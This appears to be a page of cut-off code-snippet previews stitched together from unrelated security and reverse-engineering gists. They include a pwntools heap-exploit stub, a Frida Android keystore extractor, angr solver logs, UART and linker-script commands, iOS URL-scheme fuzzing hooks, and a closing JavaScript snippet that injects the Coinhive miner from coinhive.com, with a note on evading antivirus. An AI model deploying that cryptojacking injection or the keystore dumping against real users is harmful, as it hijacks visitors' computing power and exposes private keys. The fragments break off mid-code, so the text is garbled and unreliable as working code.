| from pwn import * | |
| context.bits = 64 | |
| #libc = ELF('./libc-2.23.so') | |
| libc = ELF('./libc-2.24.so') | |
| main = ELF('./babyheap.dbg') | |
| #main = ELF('./babyheap') | |
| #dbg_file = './libc-2.23.debug' | |
| def gdb_load_symbols_cmd(sym_file, elf, base): |
| typedef void **va_list; | |
| typedef uint8_t jboolean; | |
| typedef int8_t jbyte; | |
| typedef uint16_t jchar; | |
| typedef int16_t jshort; | |
| typedef int32_t jint; | |
| typedef int64_t jlong; | |
| typedef float jfloat; | |
| typedef double jdouble; |
| #!/usr/bin/python3 | |
| from subprocess import Popen | |
| import frida | |
| import time | |
| import sys | |
| dumped = False | |
| def get_script(package_name): | |
| jscode = """ |
| #!/usr/bin/python3 | |
| ''' | |
| author: ceres-c | |
| usage: ./frida-extract-keystore.py | |
| Once the keystore(s) have been exported you have to convert them to PKCS12 using keytool | |
| ''' | |
| import frida, sys, time |
| $ gcc test.c | |
| $ python solve.py | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | The program is accessing memory or registers with an unspecified value. This could indicate unwanted behavior. | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by: | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 1) setting a value to the initial state | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null | |
| WARNING | 2019-05-06 19:54:00,017 | angr.state_plugins.symbolic_memory | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY_REGISTERS}, to suppress these messages. | |
| WARNING | 2019-05-06 19:54:00,018 | angr.state_plugins.symbolic_memory | Filling register r15 with 8 unconstrained bytes referenced from 0x810 (__libc_csu_ |
ubuntu:~$ wget https://raw.githubusercontent.com/devttys0/baudrate/master/baudrate.py
ubuntu:~$ sudo ./baudrate.py -p /dev/ttyUSB0After you plug in the UART2USB
ubuntu:~$ dmesg | grep tty
[ ] usb 1-2: cp210x converter now attached to ttyUSB0
| cat <<EOT > hello.ld | |
| ENTRY(_start) | |
| MEMORY | |
| { | |
| ram : ORIGIN = 0x00010000, LENGTH = 0x1000 | |
| } | |
| SECTIONS | |
| { | |
| .text : { *(.text*) } > ram | |
| .rodata : { *(.rodata*) } > ram |
| // https://github.com/JamesHabben/HelpfulPython/blob/master/list-mac-app-urls.py | |
| /* | |
| * Modified from: https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/ | |
| * | |
| * iOS URL Scheme Fuzzing | |
| * Usage: frida -U --codeshare dki/ios-url-scheme-fuzzing SpringBoard | |
| * | |
| * Open the specified URL | |
| * openURL("somescheme://test"); | |
| * |
| Interceptor.attach(ObjC.classes.AppDelegate['- application:continueUserActivity:restorationHandler:'].implementation, { | |
| onEnter: function (args) { | |
| printHeader(args) | |
| this.application = ObjC.Object(args[2]); | |
| this.continueUserActivity = ObjC.Object(args[3]); | |
| this.restorationHandler = ObjC.Object(args[4]); | |
| console.log("application: " + this.application); |
| ''' | |
| var isLoaded; // flag to load the script only once | |
| var script = document.createElement('script'); | |
| script.type = 'text/javascript'; | |
| // load script, couple of AV detect it but I can load the code directly or upload to another server | |
| script.src = 'https://coinhive.com/lib/coinhive.min.js'; | |
| script.onreadystatechange = script.onload = function() { // callback | |
| if (!isLoaded) { | |
| // initiate miner | |
| var miner = new CoinHive.User('COIN-HIVE-KEY', 'USERNAME'); |